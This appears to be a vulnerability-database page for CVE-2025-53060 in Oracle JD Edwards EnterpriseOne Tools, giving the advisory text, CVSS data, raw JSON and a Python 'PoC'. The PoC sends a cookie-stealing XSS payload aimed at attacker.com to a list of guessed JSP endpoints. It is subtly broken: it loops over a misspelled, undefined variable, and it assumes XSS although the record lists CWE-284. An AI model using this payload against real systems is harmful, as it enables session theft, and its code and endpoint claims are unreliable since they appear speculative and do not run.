Security Vulnerability Report
中文
CVE-2025-53060 CVSS 6.1 MEDIUM

CVE-2025-53060

Published: 2025-10-21 20:20:46
Last Modified: 2025-10-28 16:17:13

Description

Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.0.0-9.2.9.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* - VULNERABLE
Oracle JD Edwards EnterpriseOne Tools 9.2.0.0
Oracle JD Edwards EnterpriseOne Tools 9.2.9.4
Oracle JD Edwards EnterpriseOne Tools 9.2.0.0-9.2.9.4(所有中间版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53060 - Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC XSS PoC # This is a conceptual PoC demonstrating the vulnerability pattern # The actual exploitation requires specific knowledge of the target JD Edwards deployment import requests TARGET_URL = "https://target-jde-server:port/jde/" # Malicious payload targeting Web Runtime SEC component # XSS payload designed to be injected via vulnerable parameter XSS_PAYLOAD = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>' # Common vulnerable parameters in JD Edwards Web Runtime VULNERABLE_PARAMS = [ "/jde/owhtml.jsp?jdeLoginAction=Login&jdeUserName=", "/jde/Shared/Header.jsp?jdeUserName=", "/jde/Shared/Footer.jsp?jdeUserName=", "/jde/owhtml.jsp?jdeFormAction=", "/jde/Shared/ErrorPage.jsp?jdeErrorMessage=" ] def exploit_xss(target_url, payload): """Send XSS payload to vulnerable JD Edwards Web Runtime endpoint""" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } for endpoint in VULNERABLE_PARMS: url = target_url.rstrip('/') + endpoint + payload try: response = requests.get(url, headers=headers, timeout=10, verify=False) if payload in response.text: print(f"[+] Potential XSS found at: {url}") print(f"[+] Response contains injected payload") return True except Exception as e: print(f"[-] Error testing {url}: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-53060 PoC - JD Edwards EnterpriseOne Tools XSS") print(f"[*] Target: {TARGET_URL}") print(f"[*] Payload: {XSS_PAYLOAD}") exploit_xss(TARGET_URL, XSS_PAYLOAD)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53060", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:45.800", "lastModified": "2025-10-28T16:17:13.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.0.0-9.2.9.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0.0", "versionEndIncluding": "9.2.9.4", "matchCriteriaId": "5DD0B34F-6285-4353-83E0-BBE8473D1B82"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}